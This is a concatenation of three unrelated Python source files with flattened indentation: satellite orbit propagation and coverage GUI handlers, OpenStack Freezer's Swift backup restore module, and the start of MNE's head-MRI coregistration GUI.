with open(user_dir+ 'preprocess_data.p', 'rb') as f:
pi = pickle.load(f)
if "instrument" in miss_specs:
instru_specs = miss_specs['instrument']
elif "satellite" in miss_specs:
instru_specs = []
for sat in miss_specs["satellite"]:
if("instrument" in sat):
instru_specs.extend(sat["instrument"])
if(instru_specs is not None):
logger.info("Started computation of observation metrics")
obs = obsdatametrics.ObsDataMetrics(pi.sats)
[sat_id, ssid, obsMetrics_fl] = obs.compute_all_obs_metrics()
logger.info("Computed observation metrics")
else:
logger.info("No instruments present, skinng computation of observation metrics")
pass
# update output configuration file
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
            except Exception:
raise Exception("Output Configuration not found.")
config.out_config.update_calc_obsmetrics(sat_id=sat_id, ssid=ssid, obsMetrics_fl=obsMetrics_fl)
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
        # run the observation-metrics calculator in a background thread
        threading.Thread(target=real_click_obsmetcalcexec_btn).start()
def click_pexec_btn(self, progress_bar):
def real_click_pexec_btn():
# Execute propagation
user_dir = config.out_config.get_user_dir()
usf = user_dir + 'MissionSpecs.json'
try:
with open(usf, 'r') as mission_specs_file:
miss_specs = util.FileUtilityFunctions.from_json(mission_specs_file)
            except Exception:
raise Exception("Configuration not found.")
progress_bar.start(10)
# read in the preprocessed propagation and coverage parameters
prop_cov_param = pickle.load(open(user_dir+"prop_cov_param.p", "rb"))
            # Run orbit propagation for each of the satellites (orbits) in the constellation
sat_id = [] # list of propagated satellites (ids)
sat_eci_state_fp = [] # list of the eci-state files
sat_kep_state_fp = [] # list of the Keplerian-state files
for orb_indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[orb_indx])
pcp.cov_calcs_app = util.CoverageCalculationsApproach.SKIP # force skip of coverage calculations
opc = orbitpropcov.OrbitPropCov(pcp)
logger.info(".......Running Orbit Propagation for satellite " + str(pcp.sat_id))
opc.run()
sat_id.append(pcp.sat_id)
sat_eci_state_fp.append(pcp.sat_state_fl)
sat_kep_state_fp.append(pcp.sat_state_fl + '_Keplerian')
logger.info(".......Done.......")
# save output configuration file (any previous configuration is re-written since propagation is the first step
# to any of the future calculations such as coverage or communications, etc)
config.out_config.update_prop_out(sat_id=sat_id, sat_eci_state_fp=sat_eci_state_fp, sat_kep_state_fp=sat_kep_state_fp)
with open(user_dir + 'output.json', 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
        # run orbit propagation in a background thread
        threading.Thread(target=real_click_pexec_btn).start()
def click_covexec_btn(self, progress_bar):
def real_click_covexec_btn():
# Execute coverage calculations
user_dir = config.out_config.get_user_dir()
usf = user_dir + 'MissionSpecs.json'
try:
with open(usf, 'r') as mission_specs_file:
miss_specs = util.FileUtilityFunctions.from_json(mission_specs_file)
            except Exception:
raise Exception("Mission Configuration not found.")
progress_bar.start(10)
# read in the preprocessed propagation and coverage parameters
prop_cov_param = pickle.load( open(user_dir+ "prop_cov_param.p", "rb" ) )
            # Run coverage for each of the satellites (orbits) in the constellation
sat_id = [] # list of satellites (ids) for which coverage is calculated
sat_acc_fl = [] # list of the access files
for orb_indx in range(0,len(prop_cov_param)):
pcp = copy.deepcopy(prop_cov_param[orb_indx])
pcp.do_prop = False # force skip of propagation calculations
opc = orbitpropcov.OrbitPropCov(pcp)
logger.info(".......Running Coverage calculations for satellite " + str(pcp.sat_id) + "....")
opc.run()
sat_id.append(pcp.sat_id)
sat_acc_fl.append(pcp.sat_acc_fl)
logger.info(".......Done.......")
# update output configuration file
ocf = user_dir + 'output.json'
try:
with open(ocf, 'r') as output_config_file:
_out_config = util.FileUtilityFunctions.from_json(output_config_file)
config.out_config = OutputConfig.from_dict(_out_config)
            except Exception:
raise Exception("Output Configuration not found.")
config.out_config.update_cov_out(sat_id=sat_id, sat_acc_fl=sat_acc_fl)
with open(ocf, 'w', encoding='utf-8') as f:
json.dump(config.out_config.to_dict(), f, ensure_ascii=False, indent=4)
progress_bar.stop()
        # run the coverage calculator in a background thread
        threading.Thread(target=real_click_covexec_btn).start()
|
restore.py | '''
Copyright 2014 Hewlett-Packard
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This product includes cryptographic software written by Eric Young
(eay@cryptsoft.com). This product includes software written by Tim
Hudson (tjh@cryptsoft.com).
========================================================================
Freezer restore modes related functions
'''
from freezer.tar import tar_restore
from freezer.swift import object_to_stream
from freezer.utils import (
validate_all_args, get_match_backup, sort_backup_list)
from multiprocessing import Process, Pipe
import os
import logging
import re
import datetime
import time
def restore_fs(backup_opt_dict):
'''
Restore data from swift server to your local node. Data will be restored
in the directory specified in backup_opt_dict.restore_abs_path. The
    object specified with the --get-object option will be downloaded from
    the Swift server into the parent directory of
    backup_opt_dict.restore_abs_path. If the object was compressed during
    backup time, then it is decrypted, decompressed and de-archived to
    backup_opt_dict.restore_abs_path. Before downloading the file, the size of
    the local volume/disk/partition will be computed. If there is enough space
    the full restore will be executed. Please remember to stop any service
    that requires access to the data before starting the restore, and to
    restart the service once the restore execution has finished.
    '''
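    # Note: backup_opt_dict is assumed to carry at least restore_abs_path,
    # remote_obj_list, container and backup_name (validated just below), plus
    # the optional restore_from_date / restore_from_host handled further down.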
# List of mandatory values
required_list = [
os.path.exists(backup_opt_dict.restore_abs_path),
backup_opt_dict.remote_obj_list,
backup_opt_dict.container,
backup_opt_dict.backup_name
]
    # Argument validation. Raise ValueError if any of the arguments is not True
    if not validate_all_args(required_list):
        logging.critical("[*] Error: please provide ALL the following "
                         "arguments: {0}".format(required_list))
raise ValueError
if not backup_opt_dict.restore_from_date:
        logging.warning('[*] Restore date time not available. Setting to '
                        'current datetime')
backup_opt_dict.restore_from_date = \
re.sub(
r'^(\S+?) (.+?:\d{,2})\.\d+?$', r'\1T\2',
str(datetime.datetime.now()))
    # If restore_from_host is set, it overrides the local hostname stored in
    # backup_opt_dict.hostname
if backup_opt_dict.restore_from_host:
backup_opt_dict.hostname = backup_opt_dict.restore_from_host
# Check if there's a backup matching. If not raise Exception
backup_opt_dict = get_match_backup(backup_opt_dict)
if not backup_opt_dict.remote_match_backup:
        logging.critical(
            '[*] No backup found matching name: {0}, '
            'hostname: {1}'.format(
                backup_opt_dict.backup_name, backup_opt_dict.hostname))
raise ValueError
restore_fs_sort_obj(backup_opt_dict)
def restore_fs_sort_obj(backup_opt_dict):
    '''
    Take the options dict as argument, sort/remove duplicate elements from
    backup_opt_dict.remote_match_backup and find the closest backup to the
    date provided in backup_opt_dict.restore_from_date. The objects are
    looped backwards until the level 0 backup is found; the level 0 object
    and the subsequent level 1..N objects are then downloaded from swift and
    untarred locally, starting from level 0 up to level N.
    '''
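    # The object names matched below are assumed to follow the pattern
    # '<prefix>_<backup_name>_<timestamp>_<level>', e.g. a hypothetical
    # 'web01_mydocs_1417649003_0' for a level-0 backup taken at that epoch.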
# Convert backup_opt_dict.restore_from_date to timestamp
fmt = '%Y-%m-%dT%H:%M:%S'
opt_backup_date = datetime.datetime.strptime(
backup_opt_dict.restore_from_date, fmt)
    opt_backup_timestamp = int(time.mktime(opt_backup_date.timetuple()))
# Sort remote backup list using timestamp in reverse order,
# that is from the newest to the oldest executed backup
sorted_backups_list = sort_backup_list(backup_opt_dict)
# Get the closest earlier backup to date set in
# backup_opt_dict.restore_from_date
closest_backup_list = []
for backup_obj in sorted_backups_list:
if backup_obj.startswith('tar_metadata'):
continue
obj_name_match = re.search(
r'\S+?_{0}_(\d+)_(\d+?)$'.format(backup_opt_dict.backup_name),
backup_obj, re.I)
if not obj_name_match:
continue
        # Ensure the provided timestamp is bigger than the object timestamp
if opt_backup_timestamp >= int(obj_name_match.group(1)):
closest_backup_list.append(backup_obj)
# If level 0 is reached, break the loop as level 0 is the first
# backup we want to restore
if int(obj_name_match.group(2)) == 0:
break
if not closest_backup_list:
        logging.info('[*] No matching backup name {0} found in '
                     'container {1} for hostname {2}'.format(
                         backup_opt_dict.backup_name, backup_opt_dict.container,
                         backup_opt_dict.hostname))
raise ValueError
# Backups are looped from the last element of the list going
# backwards, as we want to restore starting from the oldest object
for backup in closest_backup_list[::-1]:
write_pipe, read_pipe = Pipe()
process_stream = Process(
target=object_to_stream, args=(
backup_opt_dict, write_pipe, backup,))
process_stream.daemon = True
process_stream.start()
tar_stream = Process(
target=tar_restore, args=(backup_opt_dict, read_pipe,))
tar_stream.daemon = True
tar_stream.start()
process_stream.join()
tar_stream.join()
    logging.info(
        '[*] Restore execution successfully finished for backup name {0}, '
        'from container {1}, into directory {2}'.format(
            backup_opt_dict.backup_name, backup_opt_dict.container,
            backup_opt_dict.restore_abs_path))
|
_coreg_gui.py | # -*- coding: utf-8 -*-
"""Traits-based GUI for head-MRI coregistration.
Hierarchy
---------
This is the hierarchy of classes for control. Brackets like [1] denote
properties that are set to be equivalent.
::
CoregFrame: GUI for head-MRI coregistration.
|-- CoregModel (model): Traits object for estimating the head mri transform.
| |-- MRIHeadWithFiducialsModel (mri) [1]: Represent an MRI head shape with fiducials.
| |-- MRISubjectSource (subject_source) [2]: Find subjects in SUBJECTS_DIR and select one.
| |-- SurfaceSource (bem): Expose points and tris of a file storing a surface.
| |-- FiducialsSource (fid): Expose points of a given fiducials fif file.
| +-- DigSource (hsp): Expose measurement information from an inst file.
|-- MlabSceneModel (scene) [3]: mayavi.core.ui.mayavi_scene
|-- HeadViewController (headview) [4]: Set head views for the given coordinate system.
| +-- MlabSceneModel (scene) [3*]: ``HeadViewController(scene=CoregFrame.scene)``
|-- SubjectSelectorPanel (subject_panel): Subject selector panel
| +-- MRISubjectSource (model) [2*]: ``SubjectSelectorPanel(model=self.model.mri.subject_source)``
|-- SurfaceObject (mri_obj) [5]: Represent a solid object in a mayavi scene.
|-- FiducialsPanel (fid_panel): Set fiducials on an MRI surface.
| |-- MRIHeadWithFiducialsModel (model) [1*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| |-- HeadViewController (headview) [4*]: ``FiducialsPanel(model=CoregFrame.model.mri, headview=CoregFrame.headview)``
| +-- SurfaceObject (hsp_obj) [5*]: ``CoregFrame.fid_panel.hsp_obj = CoregFrame.mri_obj``
|-- CoregPanel (coreg_panel): Coregistration panel for Head<->MRI with scaling.
+-- PointObject ({hsp, eeg, lpa, nasion, rpa, hsp_lpa, hsp_nasion, hsp_rpa} + _obj): Represent a group of individual points in a mayavi scene.
""" # noqa: E501
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
from ..externals.six.moves import queue
import re
from threading import Thread
import traceback
import warnings
import numpy as np
from scipy.spatial.distance import cdist
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, OK, YES, NO, CANCEL, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo, Directory,
Enum, Float, HasTraits, HasPrivateTraits, Instance,
Int, on_trait_change, Property, Str)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid, EnumEditor,
Handler, Label, TextEditor, Spring, InstanceEditor)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
from ..bem import make_bem_solution, write_bem_solution
from ..coreg import bem_fname, trans_fname
from ..defaults import DEFAULTS
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
translation, scaling, rotation_angles, Transform)
from ..coreg import (fit_matched_points, fit_point_cloud, scale_mri,
_find_fiducials_files, _point_cloud_error)
from ..viz._3d import _toggle_mlab_render
from ..utils import logger, set_config
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel, _mm_fmt
from ._file_traits import trans_wildcard, DigSource, SubjectSelectorPanel
from ._viewer import HeadViewController, PointObject, SurfaceObject
defaults = DEFAULTS['coreg']
laggy_float_editor = TextEditor(auto_set=False, enter_set=True, evaluate=float,
format_func=_mm_fmt)
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modelled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(DigSource, ())
# parameters
guess_mri_subject = Bool(True) # change MRI subject when dig file changes
grow_hair = Float(label="Grow Hair [mm]", desc="Move the back of the MRI "
"head outwards to compensate for hair on the digitizer "
"head shape")
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(1, label="R (X)")
scale_y = Float(1, label="A (Y)")
scale_z = Float(1, label="S (Z)")
rot_x = Float(0, label="R (X)")
rot_y = Float(0, label="A (Y)")
rot_z = Float(0, label="S (Z)")
trans_x = Float(0, label="R (X)")
trans_y = Float(0, label="A (Y)")
trans_z = Float(0, label="S (Z)")
# options during scaling
scale_labels = Bool(True, desc="whether to scale *.label files")
copy_annot = Bool(True, desc="whether to copy *.annot files for scaled "
"subject")
prepare_bem_model = Bool(True, desc="whether to run mne_prepare_bem_model "
"after scaling the MRI")
# secondary to parameters
scale = Property(
depends_on=['n_scale_params', 'scale_x', 'scale_y', 'scale_z'])
has_fid_data = Property(
Bool,
desc="Required fiducials data is present.",
depends_on=['mri_origin', 'hsp.nasion'])
has_pts_data = Property(
Bool,
depends_on=['mri.points', 'hsp.points'])
has_eeg_data = Property(
Bool,
depends_on=['mri.points', 'hsp.eeg_points'])
# MRI dependent
mri_origin = Property(
desc="Coordinates of the scaled MRI's nasion.",
depends_on=['mri.nasion', 'scale'])
# target transforms
mri_scale_trans = Property(
depends_on=['scale'])
head_mri_trans = Property(
desc="Transformaiton of the head shape to match the scaled MRI.",
depends_on=['hsp.nasion', 'rot_x', 'rot_y', 'rot_z',
'trans_x', 'trans_y', 'trans_z', 'mri_origin'])
# info
subject_has_bem = DelegatesTo('mri')
lock_fiducials = DelegatesTo('mri')
can_prepare_bem_model = Property(
Bool,
depends_on=['n_scale_params', 'subject_has_bem'])
can_save = Property(Bool, depends_on=['head_mri_trans'])
raw_subject = Property(
desc="Subject guess based on the raw file name.",
depends_on=['hsp.inst_fname'])
# transformed geometry
processed_mri_points = Property(depends_on=['mri.points', 'grow_hair'])
transformed_mri_points = Property(
depends_on=['processed_mri_points', 'mri_scale_trans'])
transformed_hsp_points = Property(
depends_on=['hsp.points', 'head_mri_trans'])
transformed_mri_lpa = Property(
depends_on=['mri.lpa', 'mri_scale_trans'])
transformed_hsp_lpa = Property(depends_on=['hsp.lpa', 'head_mri_trans'])
transformed_mri_nasion = Property(
depends_on=['mri.nasion', 'mri_scale_trans'])
transformed_hsp_nasion = Property(
depends_on=['hsp.nasion', 'head_mri_trans'])
transformed_mri_rpa = Property(
depends_on=['mri.rpa', 'mri_scale_trans'])
transformed_hsp_rpa = Property(
depends_on=['hsp.rpa', 'head_mri_trans'])
# fit properties
lpa_distance = Property(
depends_on=['transformed_mri_lpa', 'transformed_hsp_lpa'])
nasion_distance = Property(
depends_on=['transformed_mri_nasion', 'transformed_hsp_nasion'])
rpa_distance = Property(
depends_on=['transformed_mri_rpa', 'transformed_hsp_rpa'])
point_distance = Property(
depends_on=['transformed_mri_points', 'transformed_hsp_points'])
# fit property info strings
fid_eval_str = Property(
depends_on=['lpa_distance', 'nasion_distance', 'rpa_distance'])
points_eval_str = Property(
depends_on=['point_distance'])
@cached_property
def _get_can_prepare_bem_model(self):
return self.subject_has_bem and self.n_scale_params > 0
@cached_property
def _get_can_save(self):
return np.any(self.head_mri_trans != np.eye(4))
@cached_property
def _get_has_pts_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.points))
return has
@cached_property
def _get_has_eeg_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.eeg_points))
return has
@cached_property
def _get_has_fid_data(self):
has = (np.any(self.mri_origin) and np.any(self.hsp.nasion))
return has
@cached_property
def _get_scale(self):
if self.n_scale_params == 0:
return np.array(1)
elif self.n_scale_params == 1:
return np.array(self.scale_x)
else: # if self.n_scale_params == 3:
return np.array([self.scale_x, self.scale_y, self.scale_z])
@cached_property
def _get_mri_scale_trans(self):
if self.scale.ndim == 0:
return scaling(self.scale, self.scale, self.scale)
else:
return scaling(*self.scale)
@cached_property
def _get_mri_origin(self):
return self.mri.nasion * self.scale
@cached_property
def _get_head_mri_trans(self):
if not self.has_fid_data:
return np.eye(4)
# move hsp so that its nasion becomes the origin
x, y, z = -self.hsp.nasion[0]
trans = translation(x, y, z)
# rotate hsp by rotation parameters
rot = rotation(self.rot_x, self.rot_y, self.rot_z)
trans = np.dot(rot, trans)
# move hsp by translation parameters
transl = translation(self.trans_x, self.trans_y, self.trans_z)
trans = np.dot(transl, trans)
# move the hsp origin(/nasion) to the MRI's nasion
x, y, z = self.mri_origin[0]
tgt_mri_trans = translation(x, y, z)
trans = np.dot(tgt_mri_trans, trans)
return trans
@cached_property
def _get_processed_mri_points(self):
if self.grow_hair:
if len(self.mri.norms):
scaled_hair_dist = self.grow_hair / (self.scale * 1000)
points = self.mri.points.copy()
hair = points[:, 2] > points[:, 1]
points[hair] += self.mri.norms[hair] * scaled_hair_dist
return points
else:
error(None, "Norms missing from bem, can't grow hair")
self.grow_hair = 0
return self.mri.points
@cached_property
def _get_transformed_mri_points(self):
points = apply_trans(self.mri_scale_trans,
self.processed_mri_points)
return points
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_scale_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_scale_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_scale_trans, self.mri.rpa)
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.head_mri_trans, self.hsp.points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.head_mri_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.head_mri_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.head_mri_trans, self.hsp.rpa)
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_point_distance(self):
if (len(self.transformed_hsp_points) == 0 or
len(self.transformed_mri_points) == 0):
return
dists = cdist(self.transformed_hsp_points, self.transformed_mri_points,
'euclidean')
dists = np.min(dists, 1)
return dists
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
return 'Error: LPA=%.1f NAS=%.1f RPA=%.1f mm' % d
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
av_dist = 1000 * np.mean(self.point_distance)
std_dist = 1000 * np.std(self.point_distance)
return u"Points: μ=%.1f, σ=%.1f mm" % (av_dist, std_dist)
def _get_raw_subject(self):
# subject name guessed based on the inst file name
if '_' in self.hsp.inst_fname:
subject, _ = self.hsp.inst_fname.split('_', 1)
if subject:
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if self.guess_mri_subject:
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance=0, reset=False):
"""Exclude head shape points that are far away from the MRI head.
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if reset:
logger.info("Coregistration: Reset excluded head shape points")
with warnings.catch_warnings(record=True): # Traits None comp
self.hsp.points_filter = None
if distance <= 0:
return
# find the new filter
hsp_pts = self.transformed_hsp_points
mri_pts = self.transformed_mri_points
point_distance = _point_cloud_error(hsp_pts, mri_pts)
new_sub_filter = point_distance <= distance
n_excluded = np.sum(new_sub_filter == False) # noqa: E712
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# combine the new filter with the previous filter
old_filter = self.hsp.points_filter
if old_filter is None:
new_filter = new_sub_filter
else:
new_filter = np.ones(len(self.hsp.raw_points), np.bool8)
new_filter[old_filter] = new_sub_filter
# set the filter
with warnings.catch_warnings(record=True): # comp to None in Traits
self.hsp.points_filter = new_filter
def fit_auricular_points(self):
"""Find rotation to fit LPA and RPA."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_matched_points(src_fid, tgt_fid, rotate=True,
translate=False, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = rot
def fit_fiducials(self):
"""Find rotation and translation to fit all 3 fiducials."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z)
est = fit_matched_points(src_fid, tgt_fid, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:]
def fit_hsp_points(self):
"""Find rotation to fit head shapes."""
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
tgt_pts *= self.scale
tgt_pts -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_point_cloud(src_pts, tgt_pts, rotate=True, translate=False,
x0=x0)
self.rot_x, self.rot_y, self.rot_z = rot
def fit_scale_auricular_points(self):
"""Find rotation and MRI scaling based on LPA and RPA."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
x = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=False,
scale=1, x0=x0, out='params')
self.scale_x = 1. / x[3]
self.rot_x, self.rot_y, self.rot_z = x[:3]
def fit_scale_fiducials(self):
"""Find translation, rotation, scaling based on the three fiducials."""
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z, 1. / self.scale_x,)
est = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=True,
scale=1, x0=x0, out='params')
self.scale_x = 1. / est[6]
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:6]
def fit_scale_hsp_points(self):
"""Find MRI scaling and rotation to match head shape points."""
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
if self.n_scale_params == 1:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=1, x0=x0)
self.scale_x = 1. / est[3]
else: # if self.n_scale_params == 3:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x,
1. / self.scale_y, 1. / self.scale_z)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=3, x0=x0)
self.scale_x, self.scale_y, self.scale_z = 1. / est[3:]
self.rot_x, self.rot_y, self.rot_z = est[:3]
def get_scaling_job(self, subject_to, skip_fiducials):
"""Find all arguments needed for the scaling worker."""
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_names = []
if self.can_prepare_bem_model and self.prepare_bem_model:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name='(.+-bem)')
bem_dir, pattern = os.path.split(pattern)
for filename in os.listdir(bem_dir):
match = re.match(pattern, filename)
if match:
bem_names.append(match.group(1))
return (subjects_dir, subject_from, subject_to, self.scale,
skip_fiducials, self.scale_labels, self.copy_annot, bem_names)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file.
Parameters
----------
fname : str
File path.
"""
info = read_trans(fname)
# XXX this should really ensure that its a head->MRI trans. We should
# add from/to logic inside read_trans, which can also then invert it
# if necessary. This can then be used in a number of places
# (maxwell_filter, forward, viz._3d, etc.)
head_mri_trans = info['trans']
self.set_trans(head_mri_trans)
def reset(self):
"""Reset all the parameters affecting the coregistration."""
        self.reset_traits(('grow_hair', 'n_scale_params', 'scale_x',
'scale_y', 'scale_z', 'rot_x', 'rot_y', 'rot_z',
'trans_x', 'trans_y', 'trans_z'))
def set_trans(self, head_mri_trans):
"""Set rotation and translation params from a transformation matrix.
Parameters
----------
head_mri_trans : array, shape (4, 4)
Transformation matrix from head to MRI space.
"""
x, y, z = -self.mri_origin[0]
mri_tgt_trans = translation(x, y, z)
head_tgt_trans = np.dot(mri_tgt_trans, head_mri_trans)
x, y, z = self.hsp.nasion[0]
src_hsp_trans = translation(x, y, z)
src_tgt_trans = np.dot(head_tgt_trans, src_hsp_trans)
rot_x, rot_y, rot_z = rotation_angles(src_tgt_trans[:3, :3])
x, y, z = src_tgt_trans[:3, 3]
self.rot_x = rot_x
self.rot_y = rot_y
self.rot_z = rot_z
self.trans_x = x
self.trans_y = y
self.trans_z = z
def save_trans(self, fname):
"""Save the head-mri transform as a fif file.
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
write_trans(fname, Transform('head', 'mri', self.head_mri_trans))
class CoregFrameHandler(Handler):
"""Check for unfinished processes before closing its window."""
def object_title_changed(self, info):
"""Set the title when it gets changed."""
info.ui.title = info.object.title
def close(self, info, is_ok):
"""Handle the close event."""
if info.object.queue.unfinished_tasks:
information(None, "Can not close the window while saving is still "
"in progress. Please wait until all MRIs are "
"processed.", "Saving Still in Progress")
return False
else:
# store configuration, but don't prevent from closing on error
try:
info.object.save_config()
except Exception as exc:
warnings.warn("Error saving GUI configuration:\n%s" % (exc,))
return True
def _make_view_coreg_panel(scrollable=False):
"""Generate View for CoregPanel."""
view = View(VGroup(Item('grow_hair', show_label=True),
Item('n_scale_params', label='MRI Scaling',
style='custom', show_label=True,
editor=EnumEditor(values={0: '1:None',
1: '2:Uniform',
3: '3:3-axis'},
cols=4)),
VGrid(Item('scale_x', editor=laggy_float_editor,
show_label=True, tooltip="Scale along "
"right-left axis",
enabled_when='n_scale_params > 0',
width=+50),
Item('scale_x_dec',
enabled_when='n_scale_params > 0',
width=-50),
Item('scale_x_inc',
enabled_when='n_scale_params > 0',
width=-50),
Item('scale_step', tooltip="Scaling step",
enabled_when='n_scale_params > 0',
width=+50),
Item('scale_y', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis", width=+50),
Item('scale_y_dec',
enabled_when='n_scale_params > 1',
width=-50),
Item('scale_y_inc',
enabled_when='n_scale_params > 1',
width=-50),
Label('(Step)', width=+50),
Item('scale_z', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis", width=+50),
Item('scale_z_dec',
enabled_when='n_scale_params > 1',
width=-50),
Item('scale_z_inc',
enabled_when='n_scale_params > 1',
width=-50),
show_labels=False, show_border=True,
label='Scaling', columns=4),
HGroup(Item('fits_hsp_points',
enabled_when='n_scale_params',
tooltip="Rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance from each digitizer point to the "
"closest MRI point"),
Item('fits_ap',
enabled_when='n_scale_params == 1',
tooltip="While leaving the nasion in "
"place, rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance of the two auricular points"),
Item('fits_fid',
enabled_when='n_scale_params == 1',
tooltip="Move and rotate the digitizer "
"head shape, and scale the MRI so as to "
"minimize the distance of the three "
"fiducials."),
show_labels=False),
VGrid(Item('trans_x', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"right-left axis", width=+50),
Item('trans_x_dec', width=-50),
Item('trans_x_inc', width=-50),
Item('trans_step', tooltip="Movement step",
width=+50),
Item('trans_y', editor=laggy_float_editor,
show_label=True, tooltip="Move along "
"anterior-posterior axis", width=+50),
